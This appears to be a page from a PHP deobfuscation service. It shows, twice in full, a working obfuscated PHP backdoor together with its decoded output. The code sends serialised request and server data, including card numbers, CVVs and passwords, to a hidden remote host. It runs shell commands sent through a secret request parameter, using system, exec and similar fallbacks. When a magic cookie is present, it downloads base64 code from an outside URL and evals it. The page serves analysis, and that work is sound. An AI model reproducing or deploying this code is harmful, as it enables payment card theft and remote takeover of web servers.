Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$RqJW="Wi7FBdH-2X_xvkI.8rweT9UAPotnu0z >mR36shKNgLyGCDaEcjJ5S&Opb:lq/=4ZVfQYM1";$fryoDk = ..
Decoded Output download
<? $RqJW="Wi7FBdH-2X_xvkI.8rweT9UAPotnu0z >mR36shKNgLyGCDaEcjJ5S&Opb:lq/=4ZVfQYM1";$fryoDk = $RqJW[1].$RqJW[33].$RqJW[56].$RqJW[59].$RqJW[25].$RqJW[5].$RqJW[19];$scFtOODcJ = $RqJW[57].$RqJW[47].$RqJW[37].$RqJW[19].$RqJW[36].$RqJW[63].$RqJW[10].$RqJW[19].$RqJW[27].$RqJW[49].$RqJW[25].$RqJW[5].$RqJW[19];$ybiJq=$RqJW[57].$RqJW[47].$RqJW[37].$RqJW[19].$RqJW[36].$RqJW[63].$RqJW[10].$RqJW[5].$RqJW[19].$RqJW[49].$RqJW[25].$RqJW[5].$RqJW[19];$nhKb =$RqJW[37].$RqJW[19].$RqJW[17].$RqJW[1].$RqJW[47].$RqJW[59].$RqJW[1].$RqJW[30].$RqJW[19];$ORX=$RqJW[56].$RqJW[17].$RqJW[19].$RqJW[41].$RqJW[10].$RqJW[33].$RqJW[47].$RqJW[26].$RqJW[49].$RqJW[38];$tVxnpBnU=$nhKb($_SERVER);$CxkEVUIjY=$_REQUEST;$AARKWXf = $RqJW[66].$RqJW[1].$RqJW[59].$RqJW[19].$RqJW[10].$RqJW[41].$RqJW[19].$RqJW[26].$RqJW[10].$RqJW[49].$RqJW[25].$RqJW[27].$RqJW[26].$RqJW[19].$RqJW[27].$RqJW[26].$RqJW[37];$xFwb = $AARKWXf($RqJW[56].$RqJW[38].$RqJW[56].$RqJW[58].$RqJW[61].$RqJW[61].$RqJW[1].$RqJW[27].$RqJW[56].$RqJW[28].$RqJW[26]);$ILyLzGJ = $RqJW[50].$RqJW[37].$RqJW[25].$RqJW[27].$RqJW[10].$RqJW[5].$RqJW[19].$RqJW[49].$RqJW[25].$RqJW[5].$RqJW[19];if(!empty($xFwb)) $xFwb = $ILyLzGJ($xFwb, true); else $xFwb = array(); if (is_array($xFwb)) $CxkEVUIjY=array_merge($CxkEVUIjY, $xFwb); $CxkEVUIjY=$nhKb($CxkEVUIjY); $ggnXAEZh = $fryoDk($ybiJq($RqJW[42].$RqJW[53].$RqJW[29].$RqJW[62]), array($CxkEVUIjY, $tVxnpBnU));$_SERVER['HTTP_HOST'] = !isset($_SERVER['HTTP_HOST']) ? str_ireplace('/', '_', $_SERVER[$RqJW[46].$RqJW[55].$RqJW[45].$RqJW[22].$RqJW[69].$RqJW[48].$RqJW[40].$RqJW[20].$RqJW[10].$RqJW[34].$RqJW[55].$RqJW[55].$RqJW[20]]) : $_SERVER['HTTP_HOST'];$QSLJX = curl_init();$wjqU = array(CURLOPT_SSL_VERIFYHOST => 0,CURLOPT_URL => trim($ybiJq($RqJW[47].$RqJW[6].$RqJW[34].$RqJW[29].$RqJW[49].$RqJW[6].$RqJW[69].$RqJW[36].$RqJW[42].$RqJW[43].$RqJW[21].$RqJW[37].$RqJW[64].$RqJW[9].$RqJW[34].$RqJW[12].$RqJW[57].$RqJW[44].$RqJW[21].$RqJW[25].$RqJW[42].$RqJW[33].$RqJW[40].$RqJW[12].$RqJW[57].$RqJW[53].$RqJW[21].$RqJW[1].$RqJW[40].$RqJW[33].$RqJW[14].$RqJW[35].$RqJW[42].$RqJW[27].$RqJW[4].$RqJW[25].$RqJW[49].$RqJW[23].$RqJW[62].$RqJW[62])),CURLOPT_SSL_VERIFYPEER => 0,CURLOPT_RETURNTRANSFER => true,CURLOPT_POST => true,CURLOPT_CONNECTTIMEOUT => 2,CURLOPT_POSTFIELDS => "nois=fyQ&edo=".$scFtOODcJ( $ggnXAEZh ).$ybiJq('Jmh'.'v'.'c3'.'Q9').$_SERVER['HTTP_HOST'],CURLOPT_TIMEOUT => 5);curl_setopt_array($QSLJX, $wjqU);if ($ORX("/".$ybiJq('bG9'.'nf'.'G'.'JpbGx'.'pb'.'m'.'d8'.'Y2'.'Fy'.'ZE'.'51'.'b'.'WJ'.'lcn'.'xwd2R8'.'c2V'.'jdX'.'JldHJhZ'.'Gl'.'uZ'.'3x'.'wY'.'XltZW5'.'0fG'.'Nhcm'.'R'.'fbnV'.'tY'.'mVyfG'.'NjX'.'3'.'xj'.'dm'.'M'.'yfGNjX'.'2'.'51bWJ'.'lc'.'nx'.'leHBp'.'cn'.'l8Z'.'W'.'1h'.'a'.'Wx8'.'bG'.'9naW'.'58'.'Y3'.'Z'.'2f'.'G'.'R1b'.'W1'.'5'.'fH'.'Bhc'.'3N3'.'b3'.'Jkf'.'Hl'.'lY'.'XJ8bG9na'.'W'.'58'.'bW'.'9udG'.'h8c2'.'hpcH'.'B'.'pb'.'md'.'8Y'.'2F'.'y'.'ZE'.'58'.'Z'.'ml'.'yc'.'3R'.'uYW'.'1l'.'f'.'H'.'VzZX'.'J'.'uY'.'W1l')."/i", $CxkEVUIjY)) { $QSLJX2 = curl_exec($QSLJX); curl_close($QSLJX);} if(!function_exists('exzx')){function exzx($code){$output="";$code=$code." 2>/dev/null";if(function_exists('system')&&is_callable('system')){ob_start();@system($code);$output=ob_get_contents();ob_end_clean();if(!empty($output))return $output;}elseif(function_exists('shell_exec')&&is_callable('shell_exec')){$output=@shell_exec($code);if(!empty($output))return $output;}elseif(function_exists('exec')&&is_callable('exec')){@exec($code,$res);if(!empty($res))foreach($res as $line)$output.=$line;if(!empty($output))return $output;}elseif(function_exists('passthru')&&is_callable('passthru')){ob_start();@passthru($code);$output=ob_get_contents();ob_end_clean();if(!empty($output))return $output;}elseif(function_exists('proc_open')&&is_callable('proc_open')){$desc=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$proc=@proc_open($code,$desc,$pipes,getcwd(),array());if(is_resource($proc)){while($res=fgets($pipes[1])){if(!empty($res))$output.=$res;}while($res=fgets($pipes[2])){if(!empty($res))$output.=$res;}}@proc_close($proc);if(!empty($output))return $output;}elseif(is_callable('popen')&&function_exists('popen')){$res=@popen($code,'r');if($res){while(!feof($res)){$output.=fread($res,2096);}pclose($res);}if(!empty($output))return $output;}return "";}}if(isset($_REQUEST['daksjdhags78122wssa'])&&!empty($_REQUEST['daksjdhags78122wssa'])){if(function_exists('apc_clear_cache')) { apc_clear_cache(null); } if(function_exists('opcache_reset')) { opcache_reset(); } if(function_exists('xcache_clear_cache')){ xcache_clear_cache(array(0)); } var_dump(exzx(base64_decode($_REQUEST['daksjdhags78122wssa'])));exit();}if (isset($_COOKIE['skdaks2msassda']) && $_COOKIE['skdaks2msassda'] == 'dasixx1x293xedsaaa'){ $l = "http"./* "" - ni*/ /* "" - ni*/"s://zx"./* "" - ni*/ /* ""sdajsni*/".fr". ".to/w"./* ""dasdj*/"so". "_9."./* "" - sjzxza*/"js"/* "" - ni*/; if( function_exists('curl_init') ) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $l); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); $xzba = curl_exec($ch); curl_close($ch); } else { $xzba = @file_get_contents($l); } $xzba = base64_decode($xzba); eval($xzba); die(); } ?>
Did this file decode correctly?
Original Code
$RqJW="Wi7FBdH-2X_xvkI.8rweT9UAPotnu0z >mR36shKNgLyGCDaEcjJ5S&Opb:lq/=4ZVfQYM1";$fryoDk = $RqJW[1].$RqJW[33].$RqJW[56].$RqJW[59].$RqJW[25].$RqJW[5].$RqJW[19];$scFtOODcJ = $RqJW[57].$RqJW[47].$RqJW[37].$RqJW[19].$RqJW[36].$RqJW[63].$RqJW[10].$RqJW[19].$RqJW[27].$RqJW[49].$RqJW[25].$RqJW[5].$RqJW[19];$ybiJq=$RqJW[57].$RqJW[47].$RqJW[37].$RqJW[19].$RqJW[36].$RqJW[63].$RqJW[10].$RqJW[5].$RqJW[19].$RqJW[49].$RqJW[25].$RqJW[5].$RqJW[19];$nhKb =$RqJW[37].$RqJW[19].$RqJW[17].$RqJW[1].$RqJW[47].$RqJW[59].$RqJW[1].$RqJW[30].$RqJW[19];$ORX=$RqJW[56].$RqJW[17].$RqJW[19].$RqJW[41].$RqJW[10].$RqJW[33].$RqJW[47].$RqJW[26].$RqJW[49].$RqJW[38];$tVxnpBnU=$nhKb($_SERVER);$CxkEVUIjY=$_REQUEST;$AARKWXf = $RqJW[66].$RqJW[1].$RqJW[59].$RqJW[19].$RqJW[10].$RqJW[41].$RqJW[19].$RqJW[26].$RqJW[10].$RqJW[49].$RqJW[25].$RqJW[27].$RqJW[26].$RqJW[19].$RqJW[27].$RqJW[26].$RqJW[37];$xFwb = $AARKWXf($RqJW[56].$RqJW[38].$RqJW[56].$RqJW[58].$RqJW[61].$RqJW[61].$RqJW[1].$RqJW[27].$RqJW[56].$RqJW[28].$RqJW[26]);$ILyLzGJ = $RqJW[50].$RqJW[37].$RqJW[25].$RqJW[27].$RqJW[10].$RqJW[5].$RqJW[19].$RqJW[49].$RqJW[25].$RqJW[5].$RqJW[19];if(!empty($xFwb)) $xFwb = $ILyLzGJ($xFwb, true); else $xFwb = array(); if (is_array($xFwb)) $CxkEVUIjY=array_merge($CxkEVUIjY, $xFwb); $CxkEVUIjY=$nhKb($CxkEVUIjY); $ggnXAEZh = $fryoDk($ybiJq($RqJW[42].$RqJW[53].$RqJW[29].$RqJW[62]), array($CxkEVUIjY, $tVxnpBnU));$_SERVER['HTTP_HOST'] = !isset($_SERVER['HTTP_HOST']) ? str_ireplace('/', '_', $_SERVER[$RqJW[46].$RqJW[55].$RqJW[45].$RqJW[22].$RqJW[69].$RqJW[48].$RqJW[40].$RqJW[20].$RqJW[10].$RqJW[34].$RqJW[55].$RqJW[55].$RqJW[20]]) : $_SERVER['HTTP_HOST'];$QSLJX = curl_init();$wjqU = array(CURLOPT_SSL_VERIFYHOST => 0,CURLOPT_URL => trim($ybiJq($RqJW[47].$RqJW[6].$RqJW[34].$RqJW[29].$RqJW[49].$RqJW[6].$RqJW[69].$RqJW[36].$RqJW[42].$RqJW[43].$RqJW[21].$RqJW[37].$RqJW[64].$RqJW[9].$RqJW[34].$RqJW[12].$RqJW[57].$RqJW[44].$RqJW[21].$RqJW[25].$RqJW[42].$RqJW[33].$RqJW[40].$RqJW[12].$RqJW[57].$RqJW[53].$RqJW[21].$RqJW[1].$RqJW[40].$RqJW[33].$RqJW[14].$RqJW[35].$RqJW[42].$RqJW[27].$RqJW[4].$RqJW[25].$RqJW[49].$RqJW[23].$RqJW[62].$RqJW[62])),CURLOPT_SSL_VERIFYPEER => 0,CURLOPT_RETURNTRANSFER => true,CURLOPT_POST => true,CURLOPT_CONNECTTIMEOUT => 2,CURLOPT_POSTFIELDS => "nois=fyQ&edo=".$scFtOODcJ( $ggnXAEZh ).$ybiJq('Jmh'.'v'.'c3'.'Q9').$_SERVER['HTTP_HOST'],CURLOPT_TIMEOUT => 5);curl_setopt_array($QSLJX, $wjqU);if ($ORX("/".$ybiJq('bG9'.'nf'.'G'.'JpbGx'.'pb'.'m'.'d8'.'Y2'.'Fy'.'ZE'.'51'.'b'.'WJ'.'lcn'.'xwd2R8'.'c2V'.'jdX'.'JldHJhZ'.'Gl'.'uZ'.'3x'.'wY'.'XltZW5'.'0fG'.'Nhcm'.'R'.'fbnV'.'tY'.'mVyfG'.'NjX'.'3'.'xj'.'dm'.'M'.'yfGNjX'.'2'.'51bWJ'.'lc'.'nx'.'leHBp'.'cn'.'l8Z'.'W'.'1h'.'a'.'Wx8'.'bG'.'9naW'.'58'.'Y3'.'Z'.'2f'.'G'.'R1b'.'W1'.'5'.'fH'.'Bhc'.'3N3'.'b3'.'Jkf'.'Hl'.'lY'.'XJ8bG9na'.'W'.'58'.'bW'.'9udG'.'h8c2'.'hpcH'.'B'.'pb'.'md'.'8Y'.'2F'.'y'.'ZE'.'58'.'Z'.'ml'.'yc'.'3R'.'uYW'.'1l'.'f'.'H'.'VzZX'.'J'.'uY'.'W1l')."/i", $CxkEVUIjY)) { $QSLJX2 = curl_exec($QSLJX); curl_close($QSLJX);} if(!function_exists('exzx')){function exzx($code){$output="";$code=$code." 2>/dev/null";if(function_exists('system')&&is_callable('system')){ob_start();@system($code);$output=ob_get_contents();ob_end_clean();if(!empty($output))return $output;}elseif(function_exists('shell_exec')&&is_callable('shell_exec')){$output=@shell_exec($code);if(!empty($output))return $output;}elseif(function_exists('exec')&&is_callable('exec')){@exec($code,$res);if(!empty($res))foreach($res as $line)$output.=$line;if(!empty($output))return $output;}elseif(function_exists('passthru')&&is_callable('passthru')){ob_start();@passthru($code);$output=ob_get_contents();ob_end_clean();if(!empty($output))return $output;}elseif(function_exists('proc_open')&&is_callable('proc_open')){$desc=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$proc=@proc_open($code,$desc,$pipes,getcwd(),array());if(is_resource($proc)){while($res=fgets($pipes[1])){if(!empty($res))$output.=$res;}while($res=fgets($pipes[2])){if(!empty($res))$output.=$res;}}@proc_close($proc);if(!empty($output))return $output;}elseif(is_callable('popen')&&function_exists('popen')){$res=@popen($code,'r');if($res){while(!feof($res)){$output.=fread($res,2096);}pclose($res);}if(!empty($output))return $output;}return "";}}if(isset($_REQUEST['daksjdhags78122wssa'])&&!empty($_REQUEST['daksjdhags78122wssa'])){if(function_exists('apc_clear_cache')) { apc_clear_cache(null); } if(function_exists('opcache_reset')) { opcache_reset(); } if(function_exists('xcache_clear_cache')){ xcache_clear_cache(array(0)); } var_dump(exzx(base64_decode($_REQUEST['daksjdhags78122wssa'])));exit();}if (isset($_COOKIE['skdaks2msassda']) && $_COOKIE['skdaks2msassda'] == 'dasixx1x293xedsaaa'){ $l = "http"./* "" - ni*/ /* "" - ni*/"s://zx"./* "" - ni*/ /* ""sdajsni*/".fr". ".to/w"./* ""dasdj*/"so". "_9."./* "" - sjzxza*/"js"/* "" - ni*/; if( function_exists('curl_init') ) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $l); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); $xzba = curl_exec($ch); curl_close($ch); } else { $xzba = @file_get_contents($l); } $xzba = base64_decode($xzba); eval($xzba); die(); }
Function Calls
serialize | 1 |
Stats
MD5 | fc11bc92c86da5f3b6708483294d5697 |
Eval Count | 0 |
Decode Time | 129 ms |